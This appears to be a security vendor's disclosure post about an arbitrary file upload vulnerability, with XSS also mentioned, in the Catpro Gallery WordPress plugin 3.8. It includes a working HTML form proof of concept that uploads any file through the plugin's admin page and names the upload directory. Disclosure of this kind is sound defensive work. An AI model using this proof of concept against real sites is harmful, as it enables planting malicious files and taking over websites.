07 Jun

Arbitrary File Upload Vulnerability in Catpro Gallery

The Catpro Gallery plugin has an arbitrary file upload vulnerability (as well as a persistent cross-site scripting (XSS) vulnerability and possibly other security issues) as of version 3.8. The details of the underlying issue that causes this can be found in our post for a vulnerability in the plugin Vertical Slideshow, which shares the same vulnerable code.

Proof of Concept

The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories the uploaded file will be located in the directory /wp-content/uploads/catpro/1_uploadfolder/big/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=catpro_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="cpr_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/7/2016 – WordPress.org Plugin Directory notified.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for half off for the first year when you sign up now.

One thought on “Arbitrary File Upload Vulnerability in Catpro Gallery

Leave a Reply

Your email address will not be published. Required fields are marked *